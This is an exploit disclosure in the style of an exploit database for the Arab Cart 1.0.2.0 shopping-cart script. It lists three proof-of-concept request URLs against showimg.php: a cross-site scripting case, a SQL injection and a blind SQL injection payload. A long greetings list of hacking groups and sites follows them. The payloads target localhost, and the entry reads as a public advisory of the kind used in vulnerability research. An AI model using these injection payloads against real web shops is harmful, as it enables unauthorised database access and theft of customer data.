======================================================================================== | # Title : Arab Cart Version 1.0.2.0 Mullti Vulnerability | # Author : indoushka | # email : indoushka@dgsn.dz | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # Web Site : http://sourceforge.net/projects/arab-cart/ | # Script : Copyright ArabCART © .2010 | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug : Mullti | ====================== Exploit By indoushka ================================= # Exploit : 1- XSS http://127.0.0.1/arabCart/showimg.php?id=&sid=8207c6aca4d21740c20f51527ccb3f7a 2- SQL injection http://127.0.0.1/arabCart/showimg.php?id=%00' 3- Blind SQL/XPath injection http://127.0.0.1/arabCart/showimg.php?id=8+and+31337-31337=0+--+ Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ========================================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com) www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team) www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net www.alkrsan.net * www.kadmiwe.net * www.arhack.net --------------------------------------------------------------------------------------------------------------